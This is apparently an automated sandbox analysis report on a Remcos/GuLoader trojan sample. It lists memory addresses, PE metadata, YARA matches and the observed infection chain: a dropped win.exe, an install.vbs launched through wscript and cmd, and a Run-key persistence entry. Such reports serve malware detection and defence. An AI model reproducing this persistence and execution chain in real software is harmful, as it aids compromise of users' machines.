            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CA6
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4899
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2C94
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1094
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A6480
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A317B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4570
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5D71
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A116C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A095B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9951
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4948
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8547
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A093E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2D30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D2A
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1120
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4520
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5D21
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3114
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45F9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A09FD
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A31F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A49F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4DE9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0DEF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45B5
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A41A7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0D91
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2D88
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4985
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A7E78
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A73
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1265
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A6253
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8E4B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0E4D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4638
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3E30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E36
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0A37
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A27
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1204
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A12DC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A46D3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8ED0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1ED7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0EB3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4AA0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A62A4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E99
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4694
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0A88
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8E8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0E80
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A87
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1F7F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A136B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3B6F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A6363
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3B60
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1F52
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F3E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1F3C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2B37
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0F2F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B2D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B25
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1313
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4F14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A630B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4300
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B00
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2B01
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A47F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0FEB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2BD8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4FB8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8BBE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3BAF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A63AC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0F9B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4797
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4F8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2B83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B623F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0816
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CBA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5CB3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B98CB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1D2E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1204
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A27
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4638
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3E30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0A37
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E36
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8E4B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0E4D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B6253
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1265
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B7E78
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A73
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0A88
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8E8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0E80
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A87
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E99
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4694
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4AA0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B62A4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0EB3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B12DC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B46D3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8ED0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1ED7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B630B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B01
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4300
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B00
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1313
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4F14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0F2F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B2D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B25
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F3E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1F3C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B37
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1F52
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B136B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3B6F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B6363
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3B60
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1F7F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4F8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0F9B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4797
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3BAF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B63AC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4FB8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8BBE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2BD8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0FEB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B47F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3C0C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B641B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C16
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0C25
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3C3F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2C33
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B104C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4847
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0C5B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C68
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B247D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B6480
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4899
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2C94
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1094
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CA6
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B10CB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B44CF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CC1
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B44C0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B64DB
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: win.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384937023.00000000029A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCamases3.exeFE2Xj vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384197435.00000000020A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466440658.000000001E030000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462556682.000000000085C000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462556682.000000000085C000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466753489.000000001E130000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466753489.000000001E130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000000.383148228.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462715117.0000000002400000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeBinary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal96.troj.evad.winEXE@19/10@9/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile created: C:\Users\user\AppData\Roaming\win.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-E2OTZW
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile created: C:\Users\user\AppData\Local\Temp\~DF1570032FE38D6039.TMPJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\win.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\win.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\win.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.603499845.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.596745893.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000000.566291257.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.566645906.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_0040828A push esp; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_00405F01 pushfd ; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_00406914 push eax; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_004077CE push ss; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020BA211 push es; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8516 push es; retf
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00566CD5 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00566DA2 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565B95 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00566CD5 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00566DA2 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565B95 push es; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile created: C:\Users\user\AppData\Roaming\win.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run winJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run winJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
